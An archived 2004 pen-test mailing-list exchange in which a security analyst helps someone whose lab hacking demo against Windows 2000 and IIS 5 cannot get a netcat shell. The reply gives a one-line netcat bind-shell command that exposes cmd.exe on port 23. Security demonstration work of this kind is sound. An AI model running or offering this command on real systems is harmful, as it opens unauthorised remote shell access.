RE: Hacking Demo and Test Lab

From: Grissett, Chris CONT Ciber (Chris.Grissett.Ciber_at_usarc-emh2.army.mil)
Date: 06/11/04

  • Next message: Victor Chapela: "RE: Hacking Demo and Test Lab" 
    To: raza sharif <raza@raza.demon.co.uk>, pen-test@securityfocus.com
Date: Fri, 11 Jun 2004 10:49:30 -0400

    Try this command on the remote machine
    nc -l -p 23 -t -e cmd.exe

    This allows nc to listen on port 23 for connections. When a connection is
    made it will spawn a cmd[dos] shell, or whatever program you want to exec.
    Hope that helps. If that fails, you can really impress the execs by using
    knoppix-std (http://knoppix-std.org), to do all your hacking demos. Or if
    you'd like, you could give me access to your lab, and Id do it for you. I'm
    kidding, of course I couldn't do that, plus it would violate numerous laws
    and ethics :) Are you familiar with linux?

    Christopher Grissett
    Security Analyst
    Network Enterprise Security Team

    -----Original Message-----
    From: raza sharif [mailto:raza@raza.demon.co.uk]
    Sent: Friday, June 11, 2004 7:42 AM
    To: pen-test@securityfocus.com
    Subject: Hacking Demo and Test Lab

    Hi Folks ,

    Im doing some advanced Hacking Demos for management and also Corporates etc.

    I have a installed windows 2000 server and iis 5.0 on VMWARE GSX server.

    Im using Webdav and other exploits that all basically should spawn a shell
    using netcat.

    Im using XP as my attacking machine.

    Prob at the moment is Netcat will not spawn a shell regardless of what i
    try.

    Any ideas ? i checked the install it is windows 2000 500.1295 no reference
    to service packs etc. it's a default install.

    Also what are good demo's etc to run to show real hacking on windows 2000 ,
    iis etc..that i can get to work

    thanks

    Raza

    Raza@raza.demon.co.uk

  • Next message: Victor Chapela: "RE: Hacking Demo and Test Lab"

    Relevant Pages

    • Re: Getting pid of a remote process
      ... I am using Solaris and subprocess.Popen to spawn a process on a remote machine. ... to spawn a remote process. ...
      (comp.lang.python)
    • Re: apache and inetd
      ... processes/threads (depending on compile options) which listen for ... connections. ... If you want to spawn out of inet.d for some reason, ...
      (Debian-User)